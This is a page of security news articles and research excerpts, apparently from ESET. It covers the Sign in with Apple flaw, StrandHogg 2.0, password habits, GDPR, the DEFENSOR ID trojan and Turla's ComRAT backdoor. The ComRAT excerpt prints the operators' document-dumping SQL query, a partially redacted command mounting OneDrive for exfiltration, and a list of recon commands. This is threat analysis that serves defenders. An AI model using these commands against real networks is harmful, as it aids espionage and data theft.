Bug in ‘Sign in with Apple’ could have allowed account hijacking

The tech giant rewards the bug bounty hunter who found the severe flaw in its login mechanism with US$100,000

A bug bounty hunter has disclosed a severe flaw in Apple’s “Sign in with Apple” feature that, if exploited, could have allowed an attacker to hijack people’s accounts on major third-party services. According to Bhavuk Jain, any accounts on third-party apps and websites that used the authentication method but did not implement any additional security measures of their own were at risk.

Jain discovered the bug in April and went on to report it to Apple, which rewarded him with US$100,000 under the company’s Security Bounty program. The Indian bug bounty hunter said that Apple investigated their logs and didn’t find records of any account compromise or misuse stemming from the vulnerability. The bug has since been patched, although Apple has yet to comment publicly on Jain’s findings.

Here’s my first 6 digit bounty from @Apple. Blog post will be up next week. #bugbounty pic.twitter.com/QygxvtGYJb

— Bhavuk Jain (@bhavukjain1) May 24, 2020

Jain notes that there are two ways “Sign in with Apple” authenticates users – either by using a JSON web token (JWT) or by Apple’s servers generating a code, which then generates a JWT. When signing in, the user then has the option to either share their Apple ID associated mail with the third-party app or not.

In the latter scenario, a user-specific Apple relay Email ID is generated. Once authorization is successful, Apple generates a JWT containing the Email ID, which is used by the third-party app to log the user in. Due to missing validation, however, there was a way to subvert the process involving the JWT to hijack a user’s account – and it only required knowing the target’s email ID.

“I found I could request JWTs for any Email ID from Apple and when the signature of these tokens was verified using Apple’s public key, they showed as valid. This means an attacker could forge a JWT by linking any Email ID to it and gaining access to the victim’s account,” said Jain.

The Cupertino tech giant requires developers to add a “Sign in with Apple” option whenever other forms of social logins (Facebook, Google) are available. The feature is used by countless major services, such as Spotify, Airbnb, Adobe, eBay, and Dropbox, to name a few.

Earlier this year, a pair of severe security vulnerabilities was found in iOS Mail app, which comes pre-installed on all iOS devices. The flaws have been since patched and an update has been rolled out to the public.

1 Jun 2020 – 05:10PM

3 things to discuss with your kids before they join social media

What are some of the key things your children should know about before they make their first foray into social media?

Since technology has permeated every facet of life, social media has become a daily part of it. Adults are not the only ones flocking to social sites; an increasing number of children are too. Children actually do have their own social networks they can start their journey on; those are usually marketed as moderated safe havens, where children can interact, while parents have a degree of oversight of their activities. Even Facebook has introduced a kid’s version of its messenger app.

However, these are moderated, curated, and safe spaces that children eventually leave when they reach a certain age. So, what can you do, to make your children’s transition to more adult-centric social networks as safe and smooth as possible? As we mark the International Children’s Day and the Global Day of Parents, let’s take a look at some of the discussions you should have with your children prior to them joining Facebook, Instagram, TikTok or others social networking sites.

Are you sure you want to share that?

What goes on the internet stays on the internet; a mantra almost as old as the internet itself. Something most adults tend to forget, although it should be reiterated every time they consider sharing anything on the internet. The same mantra should be emphasized to children who are going to join social networks geared toward adults.

If they want to post or share something, they should always think about how it would reflect on them in the future. Although it may prove to be a difficult task to discuss such a topic with teenagers, it’s nevertheless important. A good rule of thumb before posting anything would be for them to ask themselves what an older relative (a grandparent for example) would say, if they saw the content.

RELATED READING: At what age should kids be able to access online services?

Perhaps another teaching moment could be to point out how a youthful indiscretion could come back to haunt them, or invalidate their career choices or even university applications in the future. Unfortunately, there are myriad examples of how tweets, forum posts and even yearbook photos and comments have come back to haunt entertainers, sports figures, and public officials alike.

Do you really know that person?

“Don’t talk to strangers” is perhaps one of the most repeated sentences a child hears growing up. The point is hammered home not just by parents, but teachers, public service announcements, kid’s shows, and the list goes on. So, while most teens may consider that social networks are safer since it’s online and “it doesn’t count”, parents should clearly communicate that the risks are the same and, in some cases, may even prove to be worse.

Unfortunately, you can illustrate the risks using countless examples of horror stories involving teenagers who were groomed online by child predators and eventually fell victim to them. Alternatively, there are multiple movies and TV series episodes dealing with the topic of interacting with strangers online, as one ancient proverb says: “it’s better to see something once than to hear about it a thousand times.” Black Mirror is one such show that deals with the dark side of technology and connected life, albeit in a more sci-fi mode.

Privacy settings

When adults sign up to a social network, they are rarely in a hurry to go through their privacy settings, so it can’t be expected of teenagers to be any more meticulous, even if they were born into a connected world. Another thing to keep in mind is that social networks continuously update their privacy and security settings to keep up with the increased scrutiny of the general public and governments alike. Therefore, instilling in teenagers a sense of responsibility about how their data is handled and viewed is very important.

To that end, some social networks started introducing tools that allow you to conduct reviews of your privacy. Facebook, for example, has the Privacy Checkup. This comprehensive tool allows you to look at your profile through the eyes of different types of viewers, ranging from friends to strangers, so you can more easily choose what you want to share and with whom. Another nifty option lets you audit who can see your past and future posts. You can read through our article on Facebook privacy settings to have a better grasp of what options you have to secure both your and your teen’s privacy.

Final thoughts

Raising a child in a more digitalized world can prove to be a challenge, especially since times have changed and a lot of the options and technologies weren’t around when you were growing up. On the other hand, it is important not to shy away from these challenges and to prepare your kids for the obstacles they will face in the digital world as well as in the real one, since they are deeply intertwined. By talking to your children about the risks and pitfalls of social media and how to handle them responsibly, you can prepare them better for adulthood and protect them – as well as rest easier – since they will be more vigilant online.

To learn more about more dangers faced by children online as well as about how not only technology can help, head over to Safer Kids Online.

1 Jun 2020 – 11:30AM

Week in security with Tony Anscombe

New ESET research into Turla’s malicious toolkit – GDPR turns two – Critical flaw in Android devices

This week, ESET researchers published their analysis of a new version of ComRAT – one of the oldest malware families used by the Turla group to breach a number of high-profile targets, including the US military way back in 2008. As the European Union’s GDPR turns two, are companies taking privacy and consent more seriously and do individuals engage in the protection of their personal information more? Nearly all versions of Android have been found to be affected by a critical vulnerability dubbed StrandHogg 2.0. All this – and more – on WeLiveSecurity.com.

People know reusing passwords is risky – then do it anyway

And most people don’t change their password even after hearing about a breach, a survey finds

While nearly all respondents in a recent survey were aware of the risks associated with poor password hygiene, most people don’t do anywhere near enough to keep attackers at bay, the third installment of the LastPass Psychology of Passwords Report has revealed.

As many as 9 in 10 respondents surveyed by the password manager purveyor acknowledged knowing that recycling the same password or using a variation of it across multiple account was risky. Still, two-thirds used the same password or a derivate for all their online accounts, which is actually an increase of 8 percentage points from the survey conducted in 2018. The new edition of the survey took place in March of this year and canvassed opinions from 3,250 people on various continents.

The report also reveals that 53% of respondents haven’t changed their password in the last year even after they heard about a breach in the news. Also, 4 in 10 people believe that having an easy-to-remember password is more important than a secure password. Apparently some take it a bit too far, since studies have shown that year after year, passwords such as “12345”, “123456” and “123456789” top the lists of the most popular passwords.

One of the reasons people don’t apply proper password hygiene is that they underestimate the risk. In fact, 4 in 10 think that their accounts aren’t worth the hacking effort. One thing to remember is that everyone is a target. Your information can be part of a breach that involves millions of stolen credentials. That data can then be used to piece together other information, since if you recycle your passwords, bad actors can gain access to other services, including your online banking.

RELATED READING: How to spot if your password was stolen in a security breach

Speaking of which, almost three-quarters of respondents concurred that financial accounts need extra protection. About half said that email accounts needed stronger passwords since those are usually at the center of people’s digital identities and can contain tons of exploitable data. A third considers medical records sensitive enough to require protection by stronger passwords as well.

Luckily, most respondents realize that there are additional steps they can take to secure their accounts, such as multi-factor authentication (MFA). Only 1 in 5 wasn’t aware of what MFA was, while over a half said that they use it to secure their personal accounts and 37% use it at work.

To sum it up, you should avoid creating simple passwords and recycling them across accounts – two of the common password mistakes people make. Instead, opt for long passphrases, consider using a password manager and add that extra protection layer with MFA, whenever available.

28 May 2020 – 05:01PM

Critical Android flaw lets attackers hijack almost any app, steal data

Left unpatched, the vulnerability could expose almost all Android users to the risk of having their personal data intercepted by attackers

Researchers have found a critical flaw that affects nearly all devices running Android 9.0 or older, which implies that over 90% of Android users could be vulnerable. If exploited, the security hole allows hackers to hijack almost any app and steal victims’ sensitive data, according to researchers at Promon, who uncovered the vulnerability and dubbed it StrandHogg 2.0.

The good news is that malware exploiting the vulnerability has not been observed in the wild. Importantly, Google provided a patch to Android device makers in April 2020, with the fix – for Android versions 8.0, 8.1 and 9.0 – being rolled out to the public as part of the latest assortment of monthly security updates throughout this month. Promon notified Google about the vulnerability in early December 2019.

Indexed as CVE-2020-0096, the elevation of privilege flaw resides in the Android system component and can be abused through a method called reflection that allows malicious apps to impersonate legitimate applications while the victim is none the wiser. As a result, once a malicious app is downloaded and installed on a vulnerable device, an attacker could steal the victim’s access credentials, record conversations, track their movements via GPS, or access stored data such as photos or messages.

Let’s say a malicious app sneaks into your device and you click on a legit app that requires your access credentials. Instead of that app, however, the data-stealing overlay is displayed. You go on to enter your credentials and those are immediately transferred to the criminal, who now has control of this app. It isn’t just the credentials that are at risk – the app can hijack permissions that are being granted to apps, notably access to the GPS, microphone, or camera. Most apps are vulnerable to the attack by default.



The research team pointed out that compared to StrandHogg, its “less evil twin”, the newly-disclosed flaw is much more difficult to detect because of its code-based execution. Also, it can also “dynamically attack nearly any app on a given device simultaneously at the touch of a button”, whereas StrandHogg could only attack apps one at a time.

Promon theorizes that cybercriminals would probably exploit both vulnerabilities in unison since they can attack devices in different ways, while at the same time many measures used to mitigate one vulnerability cannot be applied to the other.

To protect yourself against StrandHogg 2.0, you should update your Android device to the latest available OS version. Generally speaking, it’s also important to have a reputable mobile security solution in place and to be very cautious about installing apps from outside Google Play.

27 May 2020 – 05:16PM

Crooks threaten to leak customer data stolen from e‑commerce sites

A hack-and-extort campaign takes aim at poorly secured databases replete with customer information that can be exploited for further attacks

A number of e-commerce websites from multiple continents have had their customer databases stolen, with an unknown seller offering at least 1.62 million rows of personal records for sale on a public website. The online stores – based in Germany, the United States, Brazil, Italy, India, Spain, and Belarus – have also received ransom notes as the cybercriminals threaten to release the data if the retailers don’t pay up within 10 days.

According to BleepingComputer – which broke the story and listed some of the hacked merchants – the loot may actually be far larger than what has been put up for sale. The siphoned information varies depending on the ransacked retailer and includes email addresses, hashed passwords, postal addresses, gender and dates of birth.

Cybercriminals can use this Personally Identifiable Information (PII) for all manner of nefarious activities, including identity theft or targeted phishing attacks. The least you as a customer can do is to change your password on the site(s) and keep an eye out for suspicious emails.

It remains unclear who the thieves are, but apparently they targeted unsecured or ill-secured servers that can be found on the public web. They copied the stores’ SQL databases and now demand a ransom of 0.06 bitcoin (some US$537 at today’s rate) within 10 days on pain of publishing or using the data as they see fit.

The attackers also offer unspecified proof, which one might assume is a sample of the data. Some of the shops may have taken them up on their word, since the hackers’ BTC wallets have recently recorded transactions amounting to 5.8 bitcoin (approximately US$52,000).

Speaking of which, paying the ransom to a cybercriminal may prove to be a leap of faith, since you have no way of knowing if they won’t sell your data onwards even if they return it. Ransomware victims may face a similar conundrum, as discussed in this article.

BleepingComputer estimates that around 31 stolen databases have been put up for sale. Based on the number of abuse reports filed against the hackers’ bitcoin addresses, the site believes it to be just a fraction of the overall number. The most recent database is from March and each listing contains a sample of the data, so that potential buyers can check the wares.

Given the wealth of personal data that they may store on their customers, e-commerce sites pose a juicy target for bad actors. Hack-and-extort campaigns, meanwhile, are by no means a novel approach and high-profile incidents have affected, for example, well-known names in the entertainment industry, including HBO in 2017. Just days ago, an entertainment law firm also fell victim to a similar attack.

26 May 2020 – 08:44PM

From Agent.BTZ to ComRAT v4: A ten‑year journey

Turla has updated its ComRAT backdoor and now uses the Gmail web interface for Command and Control

ESET researchers have found a new version of one of the oldest malware families run by the Turla group, ComRAT. Turla, also known as Snake, is an infamous espionage group that has been active for more than ten years. We have previously described many campaigns attributed to this group.

ComRAT, also known as Agent.BTZ and to its developers as Chinch, is a Remote Access Trojan (RAT) that became infamous after its use in a breach of the US military in 2008. The first version of this malware, likely released in 2007, exhibited worm capabilities by spreading through removable drives. From 2007 to 2012, two new major versions of the RAT were released. Interestingly, both employed the well-known Turla XOR key:

1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s

Until mid-2017, the Turla developers made a few changes to ComRAT, but these variants were apparently still derived from the same code base.

Then, in 2017, we noticed that a very different version of ComRAT had been released. This new version used a completely new code base and was far more complex than its predecessors. Here are the main characteristics of this malware family:

ComRAT v4 was first seen in 2017 and known still to be in use as recently as January 2020. We identified at least three targets: two Ministries of Foreign Affairs and a national parliament. ComRAT was used to exfiltrate sensitive documents. The operators used public cloud services such as OneDrive and 4shared to exfiltrate data. ComRAT is a complex backdoor developed in C++. ComRAT uses a Virtual FAT16 File System formatted in FAT16. ComRAT is deployed using existing access methods, such as the PowerStallion PowerShell backdoor. ComRAT has two Command and Control channels HTTP: It uses exactly the same protocol as ComRAT v3 Email: It uses the Gmail web interface to receive commands and exfiltrate data ComRAT can perform many actions on the compromised computers, such as executing additional programs or exfiltrating files. Attribution to Turla

Based on the victimology and the TTPs, we believe that ComRAT is used exclusively by Turla. There are a few elements linking ComRAT v4 to Turla:

It uses the same internal name, Chinch, as the previous versions It uses the same custom C&C protocol over HTTP as ComRAT v3 A part of the network infrastructure is shared with another Turla malware family, Mosquito It was dropped by, or has dropped other, Turla malware families: A customized PowerShell loader The PowerStallion backdoor The RPC backdoor Insight into attacker’s activity

During our investigation, we were able to gain insights about what Turla operators were doing on the compromised machines.

The main use of ComRAT is stealing confidential documents. In one case, its operators even deployed a .NET executable to interact with the victim’s central MS SQL Server database containing the organization’s documents. Figure 1 is the redacted SQL command.

sqlCommand.CommandText = “select top ” + num2.ToString() + ” filename, img, datalength(img), id from <Redacted> with(nolock) where not img is null and id>” + num4.ToString();

sqlCommand.CommandText += ” and datalength(img)<1500000 and (filename like ‘%.doc’ or filename like ‘%.docx’ or filename like ‘[0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]%.pdf’ or (filename like ‘3%.pdf’ and len(filename)>9))”;

sqlCommand.CommandText += ” order by id”;

Figure 1. SQL command to dump documents from the central database (partially redacted)

These documents were then compressed and exfiltrated to a cloud storage provider such as OneDrive or 4shared. Cloud storage is mounted using the net use command as shown in Figure 2.

tracert -h 10 yahoo.com

net use  https://docs.live.net/E65<redacted> <redacted password> /u:<redacted>@aol.co.uk

tracert -h 10 yahoo.com

Figure 2. Command to mount a OneDrive folder using net use (partially redacted)

In addition to document stealing, the operators also run many commands to gather information about the Active Directory groups or users, the network, or Microsoft Windows configurations such as the group policies. Figure 3 is a list of commands executed by Turla operators.

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

gpresult /z

gpresult /v

gpresult

net view

net view /domain

netstat

netstat -nab

netstat -nao

nslookup 127.0.0.1

ipconfig /all

arp -a

net share

net use

systeminfo

net user

net user administrator

net user /domain

net group

net group /domain

net localgroup

net localgroup

net localgroup Administrators

net group “Domain Computers” /domain

net group “Domain Admins” /domain

net group “Domain Controllers” /domain

dir “%programfiles%”

net group “Exchange Servers” /domain

net accounts

net accounts /domain

net view 127.0.0.1 /all

net session

route print

ipconfig /displaydns

Figure 3. Basic recon of the compromised machine

Finally, we also noticed that Turla operators are aware of and try to evade security software. For instance, they regularly exfiltrate security-related log files in order to understand whether their malware samples have been detected. This shows the level of sophistication of this group and its intention to stay on the same machines for a long time.

Technical analysis

According to its compilation timestamp, which is likely genuine, the first known sample of ComRAT v4 was compiled in April 2017. The most recent iteration of the backdoor we’ve seen was, to the best of our knowledge, compiled in November 2019.

Based on ESET telemetry, we believe that ComRAT is installed using an existing foothold such as compromised credentials or via another Turla backdoor. For instance, we’ve seen ComRAT installed by PowerStallion, their PowerShell-based backdoor we described in 2019.

The ComRAT installer is a PowerShell script that creates a Windows scheduled task and fills a Registry value with the encrypted payload.

ComRAT v4 has several components:

an orchestrator, injected into explorer.exe. It controls most of ComRAT functions including the execution of backdoor commands. a communication module

Two years later, has GDPR fulfilled its promise?

Has the landmark law helped build a culture of privacy in organizations and have consumers become more wary of sharing their personal data?

“Relying on the government to protect your privacy is like asking a peeping Tom to install your window blinds” – John Perry Barlow, EFF (July 1992).

Any individual who has the slightest engagement in the privacy of their personal data online will likely be sympathetic to Barlow’s quote. It’s been 2 years since the implementation of the General Data Protection Regulation (GDPR), the EU’s data protection and privacy regulation which aimed to give control to individuals over their personal data and to simplify the requirements on businesses.

Are there fewer data breaches? Are companies taking privacy and consent more seriously? Do individuals engage in the protection of their personal information more? It’s difficult to answer the question of whether GDPR has been successful as we don’t know what would have been the state of play if the data protection regulation it succeeded was still in place.

Without doubt, though, the global privacy landscape changed with GDPR. The legislation placed the privacy conversation front and center in capitals and board rooms around the world. There are now in excess of 100 countries and states with individual privacy regulations, some more strict than others, and some of them, such as Argentina, Brazil, Chile, Japan, Kenya, South Korea and California, have clearly taken GDPR as a base model for their own legislation.

The growing number of regulations around the world demonstrates both the need and the willingness of governing bodies to step in, but with the growing number a complexity is created, something I discussed in a recent blogpost. The complexities of so many regulations probably mean that companies will look to harmonize their approach to privacy to comply with the majority and have a defensible position should they inadvertently breach a regulation.

Corporations, I am sure, have taken heed as regulators tasked with enforcing the GDPR started flexing their muscles and issuing fines or giving notice of intended fines. The first major fine, of €50 million (US$54 million), was issued in January 2019 to Google by the French data protection authority CNIL for showing insufficient control, consent and transparency over the use of personal data for behavioral advertising.

This was eclipsed by a mammoth £183 million (US$221 million) fine issued by the British Information Commissioner’s Office (ICO) against British Airways in July 2019 for poor security that resulted in a malicious attack that affected 380,000 website transactions. In comparison, Facebook was fined a mere £500,000 (US$605,000) by the ICO regarding the Cambridge Analytica scandal, which happened shortly before the implementation of GDPR and was the maximum fine at the time.

What’s the law got to do with it?

As a consumer, if you are in a country where privacy legislation has taken a similar approach to the GDPR, you will be used to seeing the numerous consent dialogues that companies are now required to display when collecting your personal data. The bold position of requiring opt-in consent set the bar for future legislation by other authorities; even if opt-out became the chosen route, the prominence of the message, which can probably, in part, be attributed to GDPR, at least gives the consumer the opportunity to make an informed decision.

There has also been a sea change in product and service development, and this too can probably, in part, be attributed to the GDPR. At the inception of a new product of service, privacy by design and default is now a relatively standard approach for any team to consider as projects come to fruition. Consumers now expect there to be a trusted relationship with a vendor and the vendor understands that this will bring long-term commercial success.

It seems impossible to write this blogpost without mentioning the current COVID-19 predicament with the numerous contact-tracing apps and location mapping data being provided to governments by telecom carriers. While privacy may have been put on hold in some cases, or at least modified to a point that in normal circumstances would be unacceptable, the visibility on personal information privacy that both the GDPR and the Cambridge Analytica scandal created have caused global scrutiny on the use of data to help solve the current pandemic. This scrutiny has seen governments backtrack on proposals and technology companies innovate new methods to ensure anonymity; there’s also a general consensus that a contact-tracing app needs to respect the user’s right to privacy.

The GDPR has legitimized privacy advocates across the globe having a voice and for their concerns to be considered and listened too. The big question, though, remains: ‘Have citizens become the owners of their personal data?’ I leave you with an inspired quote from the late Steve Jobs…

“Privacy means people know what they’re signing up for, in plain language, and repeatedly. I believe people are smart. Some people want to share more than other people do. Ask them.” – Steve Jobs

25 May 2020 – 11:30AM

Week in security with Tony Anscombe

ESET research into Winnti Group’s new backdoor – A dangerous Android app under the microscope – The BIAS Bluetooth bug

ESET researchers have published a deep-dive into a new backdoor, PipeMon, that the Winnti Group has deployed against several video gaming companies in Asia. Also this week, ESET researchers released their analysis of “DEFENSOR ID”, a particularly insidious banking trojan that had snuck into Google Play. Academics disclose a security flaw in the Bluetooth protocol that left a wide range devices vulnerable to the so-called BIAS attacks. All this – and more – on WeLiveSecurity.com..

Insidious Android malware gives up all malicious features but one to gain stealth

ESET researchers detect a new way of misusing Accessibility Service, the Achilles’ heel of Android security

ESET researchers have analyzed an extremely dangerous Android app that can perform a host of nefarious actions, notably wiping out the victim’s bank account or cryptocurrency wallet and taking over their email or social media accounts. Called “DEFENSOR ID”, the banking trojan was available on Google Play at the time of the analysis. The app is fitted with standard information-stealing capabilities; however, this banker is exceptionally insidious in that after installation it requires a single action from the victim – enable Android’s Accessibility Service – to fully unleash the app’s malicious functionality.

The DEFENSOR ID app made it onto the heavily guarded Google Play store thanks to its extreme stealth. Its creators reduced the app’s malicious surface to the bare minimum by removing all potentially malicious functionalities but one: abusing Accessibility Service.

Accessibility Service is long known to be the Achilles’ heel of the Android operating system. Security solutions can detect it in countless combinations with other suspicious permissions and functions, or malicious functionalities – but when faced with no additional functionality nor permission, all failed to trigger any alarm on DEFENSOR ID.

By “all” we mean all security mechanisms guarding the official Android app store (including the detection engines of the members of the App Defense Alliance) and all security vendors participating in the VirusTotal program (see Figure 1).

Figure 1. According to the VirusTotal service, no security vendor detected the DEFENSOR ID app until it was pulled off the Play store

DEFENSOR ID was released on Feb 3, 2020 and last updated to v1.4 on May 6, 2020. The latest version is analyzed here; we weren’t able to determine if the earlier versions were also malicious. According to its profile at Google Play (see Figure 2) the app reached a mere 10+ downloads. We reported it to Google on May 16, 2020 and since May 19, 2020 the app has no longer been available on Google Play.

The developer name used, GAS Brazil, suggests the criminals behind the app targeted Brazilian users. Apart from including the country’s name, the app’s name is probably intended to imply a relationship with the antifraud solution named GAS Tecnologia. That security software is commonly installed on computers in Brazil as several banks require it to log into their online banking. However, there is also an English version of the DEFENSOR ID app (see Figure 3) besides the Portuguese one, and that app has neither geographical nor language restrictions.

Playing further off the suggested GAS Tecnologia link, the app promises better security for its users. The description in Portuguese promises more protection for the user’s applications, including end-to-end encryption. Deceptively, the app was listed in the Education section.

Figure 2. The DEFENSOR ID app on Google Play – Portuguese version (translates roughly as: “Your new Defensor app available for: / Individuals / Legal entities / From now on you will have more protection when using your applications, encryption for end-to-end users”)

Figure 3. The DEFENSOR ID app on Google Play – English version

Functionality

After starting, DEFENSOR ID requests the following permissions:

allow modify system settings permit drawing over other apps, and activate accessibility services.

If an unsuspecting user grants these permissions (see Figure 4), the trojan can read any text displayed in any app the user may launch – and send it to the attackers. This means the attackers can steal the victim’s credentials for logging into apps, SMS and email messages, displayed cryptocurrency private keys, and even software-generated 2FA codes.

The fact the trojan can steal both the victim’s credentials and can control also their SMS messages and generated 2FA codes means DEFENSOR ID’s operators can bypass two-factor authentication. This opens the door to, for example, fully controlling the victim’s bank account.

To make sure the trojan survives a device restart, it abuses already activated accessibility services that will launch the trojan right after start.

 

Figure 4. The permission requests by DEFENSOR ID

Our analysis shows the DEFENSOR ID trojan can execute 17 commands received from the attacker-controlled server such as uninstalling an app, launching an app and then performing any click/tap action controlled remotely by the attacker (see Figure 5).

Figure 5. The list of commands DEFENSOR ID may get from its C&C server

In 2018, we saw similar behavior, but all the click actions were hardcoded and suited only for the app of the attacker’s choice. In this case, the attacker can get the list of all installed apps and then remotely launch the victim’s app of their choice to either steal credentials or perform malicious actions (e.g. send funds via a wire transfer).

We believe that this is the reason the DEFENSOR ID trojan requests the user to allow “Modify system settings”. Subsequently, the malware will change the screen off time-out to 10 minutes. This means that, unless victims lock their devices via the hardware button, the timer provides plenty of time for the malware to remotely perform malicious, in-app operations.

If the device gets locked, the malware can’t unlock it.

Malware data leak

When we analyzed the sample, we realized that the malware operators left the remote database with some of the victims’ data freely accessible, without any authentication. The database contained the last activity performed on around 60 compromised devices. We found no other information stolen from the victims to be accessible.

Thanks to this data leak, we were able to confirm that the malware really worked as designed: the attacker had access to the victims’ entered credentials, displayed or written emails and messages, etc.

Once we reached the non-secured database, we were able to directly observe the app’s malicious behavior. To illustrate the level of threat the DEFENSOR ID app posed, we performed three tests.

First, we launched a banking app and entered the credentials there. The credentials were immediately available in the leaky database –